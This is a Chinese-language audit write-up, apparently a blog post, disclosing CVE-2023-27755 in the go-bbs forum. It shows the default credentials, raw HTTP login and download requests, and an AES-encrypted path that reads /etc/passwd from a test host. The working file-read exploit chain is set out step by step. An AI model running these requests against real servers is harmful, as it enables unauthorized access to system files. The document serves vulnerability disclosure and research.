成功获取到垃圾的CVE编号:cve-2023-27755

安装

  1. 下载:git clone https://github.com/gobbscom/go-bbs.git
  2. 创建目录: cd go-bbs && mkdir conf
  3. 复制配置文件:cp app.conf.example conf/app.conf
  4. 修改数据库配置
  5. 执行./go-bbs --install 安装数据库,
  6. 最后执行 ./go-bbs 访问对应端口即可

审计

查看路由API routers/router.go 196行

image-20230226135232584

跟进 &home.SingleController{} Download 方法,该接口需要登录,通过全局搜索 Customer 默认会添加一个用户

UserName: User
PassWord: 123456

image-20230226140055054

查看 router.go ,跟进 &home.LoginController{},传入 username 和 password 进行登录

beego.Router("/login.html", &home.LoginController{}, "Post:Login")

image-20230226140353555

POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=user&password=123456

获取到凭证:beegosessionID=***

image-20230226142609834

传进来的URL需要进行AesDecrypt

image-20230226142053902

所以要对下载的路径进行 AesEncrypt

image-20230226142515019

GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close

利用凭证访问下载的API,成功下载/etc/passwd

image-20230226142712804